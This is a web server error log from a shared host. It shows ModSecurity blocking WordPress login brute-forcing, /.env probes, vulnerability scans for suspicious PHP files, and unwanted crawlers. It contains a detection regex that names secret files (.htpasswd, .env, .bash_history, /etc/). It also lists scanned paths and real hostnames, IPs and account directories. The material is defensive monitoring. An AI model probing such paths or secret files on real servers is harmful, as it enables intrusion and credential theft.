[Tue May 26 18:24:39.522087 2026] [proxy_http:error] [pid 983082:tid 983292] [client 198.235.24.153:61424] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:24:41.783320 2026] [security2:error] [pid 983082:tid 983332] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYELvhpIlZJOtze4tb5gAAAP0"]
[Tue May 26 18:24:42.168740 2026] [security2:error] [pid 983082:tid 983279] [client 162.43.251.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWYEbvhpIlZJOtze4tcBAAAAMg"]
[Tue May 26 18:24:42.197662 2026] [security2:error] [pid 983082:tid 983124] [remote 217.112.89.35:60236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYErvhpIlZJOtze4tcBwAAoyk"]
[Tue May 26 18:24:43.756518 2026] [security2:error] [pid 983082:tid 983309] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYErvhpIlZJOtze4tcGAAAAOY"]
[Tue May 26 18:24:47.142710 2026] [security2:error] [pid 983082:tid 983286] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYFbvhpIlZJOtze4tcWwAAAM8"]
[Tue May 26 18:24:47.414002 2026] [security2:error] [pid 983082:tid 983153] [remote 74.7.241.58:38610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWYF7vhpIlZJOtze4tceQAA3kY"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/mosykay.com/account/lang/th
[Tue May 26 18:24:48.785318 2026] [security2:error] [pid 983082:tid 983168] [remote 84.247.181.196:42338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWYGLvhpIlZJOtze4tckQAA9lU"]
[Tue May 26 18:24:49.114466 2026] [security2:error] [pid 983082:tid 983151] [remote 84.247.181.196:42338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWYGLvhpIlZJOtze4tcmgAAzkQ"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 18:24:49.466740 2026] [security2:error] [pid 983082:tid 983311] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYGLvhpIlZJOtze4tciQAAAOg"]
[Tue May 26 18:24:50.038207 2026] [autoindex:error] [pid 983082:tid 983333] [client 43.156.50.197:33896] AH01276: Cannot serve directory /home1/dprlky8f/dprassurance.lk/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:24:51.850612 2026] [security2:error] [pid 983082:tid 983268] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYGrvhpIlZJOtze4tcuwAAAL0"]
[Tue May 26 18:24:54.852883 2026] [security2:error] [pid 983082:tid 983313] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYHbvhpIlZJOtze4tc-QAAAOo"]
[Tue May 26 18:24:57.632486 2026] [security2:error] [pid 983082:tid 983283] [client 176.65.139.236:53988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "filosha.com"] [uri "/.env"] [unique_id "ahWYIbvhpIlZJOtze4tdSgAAAMw"]
[Tue May 26 18:24:57.769015 2026] [security2:error] [pid 983082:tid 983334] [client 176.65.139.232:22802] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "filosha.com.freshmindsolutions.com"] [uri "/.env"] [unique_id "ahWYIbvhpIlZJOtze4tdUQAAAP8"]
[Tue May 26 18:24:57.975993 2026] [security2:error] [pid 983082:tid 983303] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYILvhpIlZJOtze4tdNAAAAOA"]
[Tue May 26 18:24:59.081975 2026] [security2:error] [pid 983082:tid 983329] [client 185.191.171.15:10940] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-february/day/2025-07-12/"] [unique_id "ahWYI7vhpIlZJOtze4tdYwAAAPo"]
[Tue May 26 18:24:59.082117 2026] [security2:error] [pid 983082:tid 983329] [client 185.191.171.15:10940] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-february/day/2025-07-12/"] [unique_id "ahWYI7vhpIlZJOtze4tdYwAAAPo"]
[Tue May 26 18:24:59.734712 2026] [security2:error] [pid 983082:tid 983238] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYIrvhpIlZJOtze4tdWgAAAJ8"]
[Tue May 26 18:25:00.961020 2026] [autoindex:error] [pid 983082:tid 983270] [client 20.243.201.105:57224] AH01276: Cannot serve directory /home1/newde164/public_html/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 18:25:01.272535 2026] [security2:error] [pid 983082:tid 983248] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYJLvhpIlZJOtze4tddAAAAKk"]
[Tue May 26 18:25:04.802683 2026] [security2:error] [pid 983082:tid 983288] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYJ7vhpIlZJOtze4tduAAAANE"]
[Tue May 26 18:25:06.588052 2026] [security2:error] [pid 983082:tid 983202] [remote 94.76.235.103:55142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYKrvhpIlZJOtze4td-AAAs3c"]
[Tue May 26 18:25:07.084350 2026] [security2:error] [pid 983082:tid 983244] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYKrvhpIlZJOtze4td7gAAAKU"]
[Tue May 26 18:25:08.162085 2026] [security2:error] [pid 983082:tid 983261] [client 185.231.154.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWYLLvhpIlZJOtze4teLQAAALY"], referer: http://anujtradingco.com/homepages/shop-parallax/
[Tue May 26 18:25:09.749350 2026] [security2:error] [pid 983082:tid 983228] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYLLvhpIlZJOtze4teOwAAAJU"]
[Tue May 26 18:25:09.878573 2026] [security2:error] [pid 983082:tid 983180] [remote 173.212.245.56:37460] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.245.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWYLbvhpIlZJOtze4teWwAA_GE"]
[Tue May 26 18:25:10.189453 2026] [security2:error] [pid 983082:tid 983095] [remote 173.212.245.56:37460] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.245.212.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWYLrvhpIlZJOtze4teYgAA_Qw"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 18:25:12.917250 2026] [security2:error] [pid 983082:tid 983254] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYL7vhpIlZJOtze4tefgAAAK8"]
[Tue May 26 18:25:15.364482 2026] [security2:error] [pid 983082:tid 983108] [remote 78.142.18.172:50170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWYM7vhpIlZJOtze4te0QABAxk"]
[Tue May 26 18:25:16.537777 2026] [security2:error] [pid 983082:tid 983200] [remote 78.142.18.172:50170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWYNLvhpIlZJOtze4te7wAAz3U"], referer: https://moes-art.com/wp-login.php
[Tue May 26 18:25:16.671910 2026] [security2:error] [pid 983082:tid 983217] [client 216.73.216.242:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "afstpaul.org"] [uri "/index.php"] [unique_id "ahWYMrvhpIlZJOtze4tevQAAAIo"]
[Tue May 26 18:25:19.523347 2026] [security2:error] [pid 983082:tid 983263] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYNLvhpIlZJOtze4te7QAAALg"]
[Tue May 26 18:25:19.605155 2026] [security2:error] [pid 983082:tid 983332] [client 104.23.221.194:11044] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rmbtsbd.com"] [uri "/public/index.php"] [unique_id "ahWYN7vhpIlZJOtze4tfGQAAAP0"]
[Tue May 26 18:25:20.915635 2026] [security2:error] [pid 983082:tid 983312] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYNrvhpIlZJOtze4tfEQAAAOk"]
[Tue May 26 18:25:23.069170 2026] [security2:error] [pid 983082:tid 983221] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYObvhpIlZJOtze4tfNQAAAI4"]
[Tue May 26 18:25:23.184331 2026] [security2:error] [pid 983082:tid 983110] [remote 72.167.150.128:59406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYOrvhpIlZJOtze4tfWwAAyxs"]
[Tue May 26 18:25:23.770162 2026] [security2:error] [pid 983082:tid 983185] [remote 72.167.150.128:59406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYO7vhpIlZJOtze4tfagABAmY"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:25:24.087420 2026] [security2:error] [pid 983082:tid 983326] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYOrvhpIlZJOtze4tfTAAAAPc"]
[Tue May 26 18:25:24.323811 2026] [security2:error] [pid 983082:tid 983103] [remote 217.112.89.35:42724] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 35.89.112.217.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWYPLvhpIlZJOtze4tfdwAAkxQ"]
[Tue May 26 18:25:25.223203 2026] [core:crit] [pid 983082:tid 983219] (13)Permission denied: [client 207.46.13.128:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:25:25.245271 2026] [security2:error] [pid 983082:tid 983278] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYO7vhpIlZJOtze4tfbQAAAMc"]
[Tue May 26 18:25:27.678561 2026] [security2:error] [pid 983082:tid 983330] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYPrvhpIlZJOtze4tfjwAAAPs"]
[Tue May 26 18:25:29.328329 2026] [security2:error] [pid 983082:tid 983120] [remote 171.235.163.210:42436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.163.235.171.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYQbvhpIlZJOtze4tfvQAAwSU"]
[Tue May 26 18:25:31.198094 2026] [security2:error] [pid 983082:tid 983315] [client 113.169.32.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYQbvhpIlZJOtze4tfyQAAAOw"]
[Tue May 26 18:25:32.842220 2026] [security2:error] [pid 983082:tid 983297] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYQ7vhpIlZJOtze4tf5AAAANo"]
[Tue May 26 18:25:32.883516 2026] [autoindex:error] [pid 983082:tid 983238] [client 103.108.58.177:64921] AH01276: Cannot serve directory /home2/svijakqj/masonicarkfoundation.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:25:32.884593 2026] [security2:error] [pid 983082:tid 983243] [client 52.59.43.236:25784] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWYRLvhpIlZJOtze4tf-AAAAKQ"], referer: https://thegoodsporting.com
[Tue May 26 18:25:34.660684 2026] [security2:error] [pid 983082:tid 983215] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYRbvhpIlZJOtze4tgBgAAAIg"]
[Tue May 26 18:25:35.912180 2026] [core:crit] [pid 983082:tid 983240] (13)Permission denied: [client 207.46.13.128:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:25:38.081334 2026] [security2:error] [pid 983082:tid 983234] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYSLvhpIlZJOtze4tgTAAAAJs"]
[Tue May 26 18:25:40.216893 2026] [security2:error] [pid 983082:tid 983244] [client 185.191.171.16:34116] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWYTLvhpIlZJOtze4tgjwAAAKU"]
[Tue May 26 18:25:40.217044 2026] [security2:error] [pid 983082:tid 983244] [client 185.191.171.16:34116] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahWYTLvhpIlZJOtze4tgjwAAAKU"]
[Tue May 26 18:25:40.434409 2026] [security2:error] [pid 983082:tid 983179] [remote 162.214.184.71:51522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.184.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYTLvhpIlZJOtze4tglgAAr2A"]
[Tue May 26 18:25:40.615503 2026] [security2:error] [pid 983082:tid 983216] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYSrvhpIlZJOtze4tgfQAAAIk"]
[Tue May 26 18:25:40.802586 2026] [security2:error] [pid 983082:tid 983271] [client 20.206.111.238:42478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.siliconelevators.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWYTLvhpIlZJOtze4tgoAAAAMA"]
[Tue May 26 18:25:40.802858 2026] [security2:error] [pid 983082:tid 983271] [client 20.206.111.238:42478] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.siliconelevators.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWYTLvhpIlZJOtze4tgoAAAAMA"]
[Tue May 26 18:25:41.422262 2026] [core:crit] [pid 983082:tid 983284] (13)Permission denied: [client 40.77.167.149:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 18:25:41.801424 2026] [security2:error] [pid 983082:tid 983317] [client 20.206.111.238:40354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.siliconelevators.in"] [uri "/adminfuns.php"] [unique_id "ahWYTbvhpIlZJOtze4tgtAAAAO4"]
[Tue May 26 18:25:41.801553 2026] [security2:error] [pid 983082:tid 983317] [client 20.206.111.238:40354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autodiscover.siliconelevators.in"] [uri "/adminfuns.php"] [unique_id "ahWYTbvhpIlZJOtze4tgtAAAAO4"]
[Tue May 26 18:25:42.345416 2026] [security2:error] [pid 983082:tid 983090] [remote 162.214.184.71:51522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.184.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYTrvhpIlZJOtze4tgvAAA8wc"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:25:42.632922 2026] [security2:error] [pid 983082:tid 983301] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYTbvhpIlZJOtze4tgpgAAAN4"]
[Tue May 26 18:25:44.824034 2026] [security2:error] [pid 983082:tid 983322] [client 43.173.177.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWYULvhpIlZJOtze4tg7wAAAPM"]
[Tue May 26 18:25:44.830556 2026] [security2:error] [pid 983082:tid 983328] [client 20.206.111.238:42490] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.111.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.siliconelevators.in"] [uri "/sx_pms.php"] [unique_id "ahWYULvhpIlZJOtze4tg8gAAAPk"]
